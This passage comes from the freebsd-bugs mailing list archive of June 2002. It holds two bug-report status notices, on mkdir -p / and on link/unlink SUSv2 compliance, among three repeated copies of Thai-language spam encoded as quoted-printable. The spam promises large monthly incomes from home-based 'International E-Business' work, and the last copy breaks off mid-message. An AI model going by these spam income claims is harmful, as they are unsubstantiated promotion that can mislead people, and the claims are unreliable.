g5P8orQ44384; Tue, 25 Jun 2002 01:50:53 -0700 (PDT) (envelope-from tjr) Date: Tue, 25 Jun 2002 01:50:53 -0700 (PDT) From: Message-Id: <200206250850.g5P8orQ44384@freefall.freebsd.org> To: mi@aldan.algebra.com, tjr@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/34727: ``/bin/mkdir -p /'' fails Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ``/bin/mkdir -p /'' fails State-Changed-From-To: open->closed State-Changed-By: tjr State-Changed-When: Tue Jun 25 01:48:42 PDT 2002 State-Changed-Why: This bug was fixed by rev. 1.25 of mkdir.c http://www.freebsd.org/cgi/query-pr.cgi?pr=34727 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 1:52:29 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from hotmail.com (oe31.law11.hotmail.com [64.4.16.88]) by hub.freebsd.org (Postfix) with ESMTP id 59E7037B40D; Tue, 25 Jun 2002 01:52:12 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 25 Jun 2002 01:52:12 -0700 X-Originating-IP: [203.144.144.233] From: "mont" To: Subject: =?windows-874?B?cGFydC10aW1lIDUsMDAwLTEwLDAwMCCk2LOh57fT5LTpICEhIQ==?= Date: Tue, 25 Jun 2002 15:49:24 +0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00D2_01C21C5F.E14288A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 25 Jun 2002 08:52:12.0250 (UTC) FILETIME=[98C96BA0:01C21C25] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_00D2_01C21C5F.E14288A0 Content-Type: text/plain; charset="windows-874" Content-Transfer-Encoding: quoted-printable = =C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8=E3=B9=CD=B9= =D2=A4=B5 =B7=D3=E4=B4=E9=A7=E8=D2=C2 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA =BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2 30,000 / = =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9 =E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7 ! = =E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7=E9=D2=C1=D1=B9= =CB=C3=D7=CD=E0=BB=C5=E8=D2 =A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4=A8 = International E-Business =E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2=B9 = =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20 = =E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D4=E8=C1=C3= =D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4=D7=CD=B9 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 Part-time 15,000 =B6=D6=A7 60,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 7- 14 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 full-time 30,000 =B6=D6=A7 170,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 20- 40 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 =A2=E8=D2=C7=B4=D5 ! =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5 =A1=C3=D8=A7=E0=B7=BE=CF = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5 = =CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2=C3=BA=C3= =C3=C2=D2=C2 =BF=C3=D5 !!! = ************************************************************* = =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB=B6=D6=A7=A4= =D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8=B5=E9=CD=A7= =A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe" =20 =20 ------=_NextPart_000_00D2_01C21C5F.E14288A0 Content-Type: text/html; charset="windows-874" Content-Transfer-Encoding: quoted-printable

=C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8= =E3=B9=CD=B9=D2=A4=B5
=B7=D3=E4=B4=E9=A7=E8=D2=C2=20 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA
=BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2=20 30,000 / =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3=20 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9

=E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7=20 !
=E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7= =E9=D2=C1=D1=B9=CB=C3=D7=CD=E0=BB=C5=E8=D2

=A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4= =A8 International=20 E-Business
=E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2= =B9 =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20
=E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9= =E0=BE=D4=E8=C1=C3=D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4= =D7=CD=B9

=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 Part-time
15,000 =B6=D6=A7 = 60,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 7- 14 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC=20 =
=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 full-time
30,000 =B6=D6=A7 170,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 20- 40 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC

=A2=E8=D2=C7=B4=D5=20 !     = =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5=20 =A1=C3=D8=A7=E0=B7=BE=CF  = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5
=CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2= =C3=BA=C3=C3=C2=D2=C2   = =BF=C3=D5 !!!
*************************************************************
          &nbs= p; =20 =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB= =B6=D6=A7=A4=D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8= =B5=E9=CD=A7=A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1
=   =20 =            =        =20 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail=20 = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe"

------=_NextPart_000_00D2_01C21C5F.E14288A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 2: 2: 1 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CE15537B400; Tue, 25 Jun 2002 02:01:58 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P91wS45486; Tue, 25 Jun 2002 02:01:58 -0700 (PDT) (envelope-from tjr) Date: Tue, 25 Jun 2002 02:01:58 -0700 (PDT) From: Message-Id: <200206250901.g5P91wS45486@freefall.freebsd.org> To: tim@robbins.dropbear.id.au, tjr@FreeBSD.org, freebsd-bugs@FreeBSD.org, tjr@FreeBSD.org Subject: Re: bin/35201: link and unlink are not SUSv2-compliant as the manpage states Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: link and unlink are not SUSv2-compliant as the manpage states State-Changed-From-To: open->patched State-Changed-By: tjr State-Changed-When: Tue Jun 25 02:01:04 PDT 2002 State-Changed-Why: Fixed in -current, I will MFC the change soon. Responsible-Changed-From-To: freebsd-bugs->tjr Responsible-Changed-By: tjr Responsible-Changed-When: Tue Jun 25 02:01:04 PDT 2002 Responsible-Changed-Why: Fixed in -current, I will MFC the change soon. http://www.freebsd.org/cgi/query-pr.cgi?pr=35201 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 2:50:19 2002 Delivered-To: freebsd-bugs@freefall.freebsd.org Received: from hotmail.com (oe55.pav2.hotmail.com [64.4.36.63]) by hub.freebsd.org (Postfix) with ESMTP id 667E437B40D; Tue, 25 Jun 2002 02:49:32 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 25 Jun 2002 02:49:31 -0700 X-Originating-IP: [203.144.144.233] From: "mont" To: Subject: =?windows-874?B?cGFydC10aW1lIDUsMDAwLTEwLDAwMCCk2LOh57fT5LTpICEhIQ==?= Date: Tue, 25 Jun 2002 16:45:39 +0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01FE_01C21C67.BCB0AE60" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 25 Jun 2002 09:49:31.0844 (UTC) FILETIME=[9AF1D040:01C21C2D] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_01FE_01C21C67.BCB0AE60 Content-Type: text/plain; charset="windows-874" Content-Transfer-Encoding: quoted-printable = =C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8=E3=B9=CD=B9= =D2=A4=B5 =B7=D3=E4=B4=E9=A7=E8=D2=C2 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA =BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2 30,000 / = =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9 =E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7 ! = =E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7=E9=D2=C1=D1=B9= =CB=C3=D7=CD=E0=BB=C5=E8=D2 =A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4=A8 = International E-Business =E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2=B9 = =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20 = =E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D4=E8=C1=C3= =D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4=D7=CD=B9 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 Part-time 15,000 =B6=D6=A7 60,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 7- 14 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 full-time 30,000 =B6=D6=A7 170,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 20- 40 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 =A2=E8=D2=C7=B4=D5 ! =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5 =A1=C3=D8=A7=E0=B7=BE=CF = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5 = =CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2=C3=BA=C3= =C3=C2=D2=C2 =BF=C3=D5 !!! = ************************************************************* = =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB=B6=D6=A7=A4= =D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8=B5=E9=CD=A7= =A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe" =20 =20 ------=_NextPart_000_01FE_01C21C67.BCB0AE60 Content-Type: text/html; charset="windows-874" Content-Transfer-Encoding: quoted-printable

=C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8= =E3=B9=CD=B9=D2=A4=B5
=B7=D3=E4=B4=E9=A7=E8=D2=C2=20 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA
=BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2=20 30,000 / =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3=20 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9

=E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7=20 !
=E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7= =E9=D2=C1=D1=B9=CB=C3=D7=CD=E0=BB=C5=E8=D2

=A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4= =A8 International=20 E-Business
=E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2= =B9 =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20
=E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9= =E0=BE=D4=E8=C1=C3=D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4= =D7=CD=B9

=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 Part-time
15,000 =B6=D6=A7 = 60,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 7- 14 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC=20 =
=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 full-time
30,000 =B6=D6=A7 170,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 20- 40 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC

=A2=E8=D2=C7=B4=D5=20 !     = =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5=20 =A1=C3=D8=A7=E0=B7=BE=CF  = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5
=CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2= =C3=BA=C3=C3=C2=D2=C2   = =BF=C3=D5 !!!
*************************************************************
          &nbs= p; =20 =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB= =B6=D6=A7=A4=D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8= =B5=E9=CD=A7=A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1
=   =20 =            =        =20 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail=20 = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe"

------=_NextPart_000_01FE_01C21C67.BCB0AE60-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 2:54:38 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from hotmail.com (oe55.pav2.hotmail.com [64.4.36.63]) by hub.freebsd.org (Postfix) with ESMTP id 5EC1537B40C; Tue, 25 Jun 2002 02:49:32 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 25 Jun 2002 02:49:31 -0700 X-Originating-IP: [203.144.144.233] From: "mont" To: Subject: =?windows-874?B?cGFydC10aW1lIDUsMDAwLTEwLDAwMCCk2LOh57fT5LTpICEhIQ==?= Date: Tue, 25 Jun 2002 16:45:39 +0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01FE_01C21C67.BCB0AE60" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 25 Jun 2002 09:49:31.0844 (UTC) FILETIME=[9AF1D040:01C21C2D] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_01FE_01C21C67.BCB0AE60 Content-Type: text/plain; charset="windows-874" Content-Transfer-Encoding: quoted-printable = =C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8=E3=B9=CD=B9= =D2=A4=B5 =B7=D3=E4=B4=E9=A7=E8=D2=C2 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA =BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2 30,000 / = =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9 =E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7 ! = =E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7=E9=D2=C1=D1=B9= =CB=C3=D7=CD=E0=BB=C5=E8=D2 =A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4=A8 = International E-Business =E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2=B9 = =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20 = =E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D4=E8=C1=C3= =D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4=D7=CD=B9 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 Part-time 15,000 =B6=D6=A7 60,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 7- 14 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 full-time 30,000 =B6=D6=A7 170,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 20- 40 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 =A2=E8=D2=C7=B4=D5 ! =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5 =A1=C3=D8=A7=E0=B7=BE=CF = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5 = =CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2=C3=BA=C3= =C3=C2=D2=C2 =BF=C3=D5 !!! = ************************************************************* = =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB=B6=D6=A7=A4= =D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8=B5=E9=CD=A7= =A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe" =20 =20 ------=_NextPart_000_01FE_01C21C67.BCB0AE60 Content-Type: text/html; charset="windows-874" Content-Transfer-Encoding: quoted-printable

=C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8= =E3=B9=CD=B9=D2=A4=B5
=B7=D3=E4=B4=E9=A7=E8=D2=C2=20 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA
=BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2=20 30,000 / =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3=20 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9

=E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7=20 !
=E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7= =E9=D2=C1=D1=B9=CB=C3=D7=CD=E0=BB=C5=E8=D2

=A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4= =A8 International=20 E-Business
=E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2= =B9 =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20
=E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9= =E0=BE=D4=E8=C1=C3=D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4= =D7=CD=B9

=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 Part-time
15,000 =B6=D6=A7 = 60,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 7- 14 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC=20 =
=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 full-time
30,000 =B6=D6=A7 170,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 20- 40 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC

=A2=E8=D2=C7=B4=D5=20 !     = =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5=20 =A1=C3=D8=A7=E0=B7=BE=CF  = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5
